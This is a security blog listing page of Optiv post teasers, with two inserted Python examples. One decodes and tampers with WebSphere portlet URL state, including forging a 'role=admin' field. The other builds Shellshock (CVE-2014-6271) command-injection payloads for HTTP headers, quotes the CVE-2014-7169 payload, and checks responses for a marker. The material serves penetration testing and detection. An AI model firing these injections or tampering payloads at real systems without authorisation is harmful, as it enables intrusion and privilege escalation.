Optiv Blog

Update: Intelligence Advisory – Petya Outbreak

By gTIC

This is an update to the Intelligence Advisory: Petya Ransomware Outbreak, released June 27, 2017. Optiv’s Global Threat Intelligence Center (gTIC) has received reporting from several sources on the newly identified Petya ransomware variant. The new variant is also being referred to as GoldenEye, Petyawrapper, NotPetya, SortaPetya, and Petna.


Stagefright: The Show Must Go On

By Jonathan Ross

In April, Joshua Drake of Zimperium zLabs discovered what is arguably one of the most serious flaws ever found in Android, Google’s mobile operating system. The flaw lies in Stagefright, an over-privileged media-processing library that automatically parses media received by the device. In the attack described, the victim receives a malicious video or picture by MMS (text message), and Stagefright processes it without any interaction from the user.


Diversionary Tactics 101

By Jeff Horne

When an organization is hacked or infected with malware, one of the first questions it asks is, “Who is attacking us?” Understanding an attacker’s profile gives the organization insight into their motives, their tactics, and what they are after. The more you know about them, the more effective your defensive strategy will be.


Improving Reliability of Sandbox Results

By Brad Spengler

Cuckoo Sandbox is an increasingly popular system for automated malware analysis. Started in 2010 as a Google Summer of Code project, it has grown quickly in functionality thanks to its easily extended, open-source Python architecture.


Decoding IBM WebSphere Portlet URLs

By Raffi Erganian

Portlet-based web applications built with IBM Web Experience Factory, previously known as WebSphere Portlet Factory, produce long URLs containing gzip-compressed, base64-encoded data. Being able to view and tamper with the data passed between the client browser and the backing application server is fundamental to application penetration testing.

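The decode-edit-re-encode loop that post describes, as an added example (this is not code from the Optiv post or from IBM). It assumes only what the teaser states: a URL segment that is base64-encoded gzip. Handling both the standard and URL-safe base64 alphabets with stripped padding is an assumption about what is met in practice, and the key=value payload is a constructed stand-in for the application-specific state a real Web Experience Factory URL carries.

```python
import base64
import gzip
import re

# Constructed sample state. Real Web Experience Factory URLs carry
# serialized portlet/session state whose layout is application-specific;
# this key=value string is only a stand-in so the round trip is visible.
SAMPLE_STATE = b"page=ViewAccount&accountId=1001&role=user"


def _b64decode_lenient(blob: str) -> bytes:
    """Decode standard or URL-safe base64, restoring stripped '=' padding.

    URL-embedded blobs are often URL-safe ('-' and '_') and unpadded;
    accepting both alphabets is an assumption about what will be seen.
    """
    cleaned = re.sub(r"\s", "", blob).replace("-", "+").replace("_", "/")
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def decode_state(blob: str) -> bytes:
    """base64 -> gzip -> plaintext. Fails loudly if the blob is not gzip,
    which usually means the wrong URL segment was selected."""
    raw = _b64decode_lenient(blob)
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream (magic bytes missing)")
    return gzip.decompress(raw)


def encode_state(data: bytes, urlsafe: bool = True) -> str:
    """plaintext -> gzip -> base64, the inverse of decode_state.
    mtime=0 keeps the output deterministic across runs."""
    compressed = gzip.compress(data, compresslevel=9, mtime=0)
    encoder = base64.urlsafe_b64encode if urlsafe else base64.b64encode
    return encoder(compressed).decode("ascii").rstrip("=")


def tamper(blob: str, old: bytes, new: bytes) -> str:
    """Decode, replace one field, re-encode: the edit a tester makes in the
    proxy before forwarding the request to the application server."""
    state = decode_state(blob)
    if old not in state:
        raise ValueError("field %r not present in decoded state" % old)
    return encode_state(state.replace(old, new))


if __name__ == "__main__":
    blob = encode_state(SAMPLE_STATE)
    print("encoded:", blob)
    print("decoded:", decode_state(blob))
    forged = tamper(blob, b"role=user", b"role=admin")
    print("forged: ", decode_state(forged))
```

The gzip magic check matters in practice: these URLs contain several opaque-looking segments, and feeding the wrong one to the decoder should fail immediately rather than return garbage that gets mistaken for application state.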

Shellshock Burp Scanning

By Matthew Gill

The following is a Java plugin for the Burp web proxy that detects CVE-2014-6271, the original Shellshock bug, during active scans of web applications. Later variants of Shellshock, such as CVE-2014-7169, are not detected by this plugin.


Thoughts after a Month With Blackphone

By Joshua J. Drake

About a month ago, I decided to order a Blackphone. The product web site makes some tall claims about security, even calling it "A secure smartphone." This kind of proclamation is rather bold, perhaps even disingenuous, and often leads to intense scrutiny in the security community.


What is the Bash Shellshock Bug?

By Matthew Hoy

A vulnerability in the Bash command-line shell, present for years, has been discovered and is now being actively exploited. Dubbed the “Shellshock” bug, the flaw affects any Linux, UNIX, or Mac OS X system that runs Bash, which is to say most of them.

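The mechanism behind both Shellshock posts above (the Burp scanning plugin and this explainer), as an added example that is not the Optiv plugin or any code from those posts. It shows the CVE-2014-6271 trigger against the local bash, the header probe an active scanner injects, and the response check that decides the result. The marker token, the header list, and the two sample HTTP responses are constructed for the example; the CVE-2014-7169 payload is included only to show why a 6271 probe does not cover it.

```python
import os
import shutil
import subprocess
from typing import Optional

# Constructed marker; any token unlikely to appear in a normal page works.
MARKER = "ss_probe_7f3a9c"

# CVE-2014-6271: when bash imports a function definition from the
# environment, it also executes any command that follows the definition.
# "() { :;}" is an empty function; everything after the second ';' runs.
CVE_2014_6271_PAYLOAD = "() { :;}; echo " + MARKER

# CVE-2014-7169 (left open by the first fix) abuses a parser bug with a
# different shape: it writes a file instead of printing, so a marker
# check on stdout or on the HTTP body does not see it. Reference only;
# this script never executes it.
CVE_2014_7169_PAYLOAD = "() { (a)=>\\' bash -c \"echo " + MARKER + "\""

# Request headers that common CGI setups copy into the environment as
# HTTP_USER_AGENT, HTTP_REFERER and HTTP_COOKIE (assumed target set).
PROBE_HEADERS = ("User-Agent", "Referer", "Cookie")


def local_bash_vulnerable(bash_path: Optional[str] = None) -> Optional[bool]:
    """True if the local bash runs trailing code from an exported function,
    False if it does not, None if bash cannot be executed here."""
    bash = bash_path or shutil.which("bash")
    if not bash:
        return None
    env = dict(os.environ)
    env["SS_PROBE"] = CVE_2014_6271_PAYLOAD
    try:
        proc = subprocess.run([bash, "-c", "true"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    # A patched bash ignores the variable (it may warn on stderr); an
    # unpatched one prints the marker to stdout even though -c ran 'true'.
    return MARKER in proc.stdout


def probe_headers(header: str) -> dict:
    """Headers a scanner adds to one request. The leading 'echo;' emits the
    blank line that ends the CGI header block, so the marker lands in the
    response body instead of producing a malformed header and a 500."""
    if header not in PROBE_HEADERS:
        raise ValueError("unexpected header %r" % header)
    return {header: "() { :;}; echo; echo " + MARKER}


def is_vulnerable_response(raw_response: str) -> bool:
    """Decide from a raw HTTP response whether the probe executed. Scanning
    the whole response, not only the body, also catches the 500 case."""
    return MARKER in raw_response


# Constructed responses standing in for what a scanner would receive.
VULN_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
                 + MARKER + "\n")
CLEAN_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  "<html><body>Hello</body></html>\n")


if __name__ == "__main__":
    print("local bash vulnerable to CVE-2014-6271:", local_bash_vulnerable())
    for h in PROBE_HEADERS:
        print("probe:", probe_headers(h))
    print("vuln response flagged:", is_vulnerable_response(VULN_RESPONSE))
    print("clean response flagged:", is_vulnerable_response(CLEAN_RESPONSE))
```

Run against a patched bash the local check returns False; on a 2014-era unpatched build it returns True because the `echo` after the function body executes during environment import, before `-c 'true'` ever runs. The same asymmetry is why the plugin's scope is limited to CVE-2014-6271: a 7169 probe needs an out-of-band or filesystem-side signal rather than a string in the response.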

Crack Me If You Can - Hash Cracking Contest

By Alex Kah

The fifth annual KoreLogic “Crack Me If You Can” contest took place this past weekend at the 22nd annual DEF CON. Crack Me If You Can (CMIYC) is an annual DEF CON contest that simulates real-world penetration testing scenarios in which you might obtain large lists of hashed passwords from a client or clients. Password hashes


Cellular Exploitation on a Global Scale

By Mathew Solnik, Marc Blanchou

As a supplement to our Black Hat presentation, the videos below demonstrate attacks on cellular phones, to help educate the community about the seriousness of the risks.
